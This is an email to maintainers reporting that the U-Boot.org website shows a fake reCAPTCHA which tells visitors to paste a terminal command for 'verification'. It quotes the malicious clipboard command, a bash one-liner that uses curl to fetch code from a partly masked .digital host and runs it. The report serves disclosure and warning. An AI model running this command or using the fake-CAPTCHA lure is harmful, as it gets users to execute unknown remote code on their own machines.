Dear Maintainers,

U-Boot.org seems to be trying to social engineer visitors into executing 
potentially malicious code.

The website presents a seemingly fake re-Captcha upon visiting, which after 
ticking the box instructs the user to open their terminal and paste and execute 
a command from the clipboard for “verification".

Said command curl-s some text from a network server and runs it as a bash 
command.

I have not done much analysis on the exact behaviour of the payload, but social 
engineering users into executing arbitrary local payload is not an acceptable 
way of doing web visitor verification.

An example of the clipboard payload I am told to execute (but did not) is (sub 
XXXXXXXX with microzen)
 /bin/bash -c "$(curl -A 'Mac OS X 10_15_7' -fsSL 
'tl5mltkq.XXXXXXXX.digital/?=check&&actmn=gTGzPBzHSGwagnVq')"; echo ""BotGuard: 
Answer the protector challenge. Ref: 15978 

Best regards,
Mate Kukri

Reply via email to